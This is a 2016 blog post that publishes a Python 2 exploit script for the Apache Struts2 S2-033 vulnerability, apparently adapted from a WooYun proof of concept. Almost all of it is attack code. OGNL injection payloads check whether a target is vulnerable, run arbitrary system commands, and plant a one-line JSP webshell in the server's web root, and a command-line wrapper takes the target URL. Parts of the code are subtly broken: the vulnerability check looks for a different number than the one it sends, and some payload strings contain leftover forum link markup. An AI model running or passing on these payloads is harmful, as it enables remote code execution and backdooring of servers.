MENU

Struts2 S2-033 Exploit

June 7, 2016 • Security

struts2 S2-033 Exploit By luren@ArriSec 2016.6.7

根据乌云POC写的,有待各位验证

python27中不自带requests包,地址:http://pypi.python.org/pypi/requests#downloads

import urllib,urllib2,getopt,sys,requests
import re

def info():
    print '-u Exploit Url'
    print '-c Command'
    print '-s getshell'
    print 'EX:python Structs2_S-033.py -u [url=http://www.baidu.com]www.baidu.com[/url]'
    print 'EX:python Structs2_S-033.py -u [url=http://www.baidu.com]www.baidu.com[/url] -s shell'
    print 'EX:python Structs2_S-033.py -u [url=http://www.baidu.com]www.baidu.com[/url] -c "whoami"'
def Test(url):

    Payload ='/%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908'
    Result = Exploit_Post(url,Payload)
    if Result.find('2980') == 1:
        print 's2-033 Vulnerabilities exist'
        return 1
    else:
        print 's2-033 Vulnerabilities not exist'
        return 0
def CommandExec(url,Command):

    Payload ='/%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[url=mailto:3d@org.apache.commons.io.IOUtils]3d@org.apache.commons.io.IOUtils[/url]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command='
    Payload+=Command
    Result = Exploit_Post(url,Payload)
    return Result

def GetShell(url):

    Payload ='/%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),%23parameters.command[0].toString.json?&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=luren.jsp&content='
    Onetalkshell='<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>'
    Payload+=Onetalkshell
    Result = Exploit_Post(url,Payload)
    return Result

def Exploit_Post(url, Data):

    try:
        response = urllib2.urlopen('http://'+url, Data,timeout=10)
    except Exception as e:
        return str(e)
    Result = re.compile('[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f]').sub('', response.read())
    return Result
 
if __name__ == '__main__' :
    try:
        opts, args = getopt.getopt(sys.argv[1:],"u:c:s:")
    except:
        info()
        sys.exit(2)
    for opt, value in opts:
        if opt == '-u':
            url = value
            if Test(url)== 0:
                sys.exit(2)
        elif opt == '-c':
            print CommandExec(url,value)
 
        elif opt == '-s':
            print GetShell(url)
Tags: None
Archives QR Code
QR Code for this page
Tipping QR Code